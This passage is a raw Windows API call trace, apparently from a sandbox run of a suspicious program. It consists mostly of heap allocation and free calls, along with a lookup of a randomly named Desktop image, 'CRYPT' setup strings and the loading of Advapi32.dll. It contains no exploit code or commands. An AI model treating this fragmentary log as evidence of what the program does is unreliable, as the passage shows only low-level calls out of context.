RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ebb0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ebf0 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7edf0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7edc0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ee80 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0125.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee80 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7edf0 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7edf0 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ed90 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ee70 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee70 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7edf0 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ee70 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0125.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7edf0 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef10 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ee80 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ef20 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ee90 [0125.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee90 | out: hHeap=0x970000) returned 1 [0125.763] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-2dSSUPd3c99IL5ta.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3d862f0, ftCreationTime.dwHighDateTime=0x1d5ec49, ftLastAccessTime.dwLowDateTime=0xc71b7f30, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0xc71b7f30, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0xf8fc, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="-2dSSUPd3c99IL5ta.jpg", cAlternateFileName="-2DSSU~1.JPG")) returned 0xa6e800 [0125.763] FindClose (in: hFindFile=0xa6e800 | out: hFindFile=0xa6e800) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef20 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef10 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0125.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50410 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ee90 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0125.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef10 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ef20 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef20 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50410 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee90 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.764] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0125.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f220 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ee90 [0125.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0125.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee90 | out: hHeap=0x970000) returned 1 [0125.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0125.765] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ee90 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ef20 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef20 | out: hHeap=0x970000) returned 1 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50410 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef20 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee90 | out: hHeap=0x970000) returned 1 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ee90 [0125.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.765] GetLastError () returned 0x3f0 [0125.765] SetLastError (dwErrCode=0x3f0) [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0125.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee90 | out: hHeap=0x970000) returned 1 [0125.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0125.766] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f220 [0125.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ee90 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0125.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0125.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0125.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0125.767] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0125.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508f0 [0125.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c58 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ee90 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f220 | out: hHeap=0x970000) returned 1 [0125.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0125.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0125.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0125.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0125.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0125.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0125.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0125.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0125.768] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0125.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50800 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0125.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0125.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0125.769] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0125.769] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0125.769] RtlAllocateHeap 